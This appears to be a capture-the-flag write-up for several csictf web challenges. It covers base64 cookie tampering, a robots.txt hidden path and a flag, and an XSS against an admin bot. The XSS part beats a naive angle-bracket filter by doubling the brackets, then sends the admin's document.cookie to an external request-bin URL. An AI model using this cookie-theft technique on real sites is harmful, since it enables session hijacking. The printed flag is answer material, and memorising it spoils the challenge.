My nephew is a fussy eater and is only willing to eat chocolate oreo. Any other flavour and he throws a tantrum.
Nice and simple web challenge.
Looking at the cookie of the webpage it appears to base64 encoded.
Encode the word "chocolate" into base64 then replace the current base64 in the cookie. The only thing to note is make sure that the base64 is also url encoded.
"People who get violent get that way because they can’t communicate."
Navigating to /robots.txt
, we see:
Navigating to /fade/to/black
, we get the flag.
Flag: csictf{br0b0t_1s_pr3tty_c00l_1_th1nk}
Looking at the source you can see that a request is made to http://chall.csivit.com:30256/view
by the admin to view your colour. You can then specify a URL and a colour for the admin to use.
I set up a request bin at https://ennfyqj04serj.x.pipedream.net
so that I easily could monitor requests made to that URL. But setting the URL that the admin visits to anything outside of http://chall.csivit.com:30256/view
seemed to throw an error. However I can set the colour to anything I like.
Looking at the source of http://chall.csivit.com:30256/
it is clear that the only form of sanitising is that "<" or ">" are replaced with "". This means that later on I could use ">>" in the place of ">" and "<<" in the place of "<".
The final exploit looked like the following:
Everything before and including the first semi-colon is used to escape the tags/quotes which the url is in.
The admin cookie is then sent to https://ennfyqj04serj.x.pipedream.net/?c="+document.cookie
and the cookie is your flag.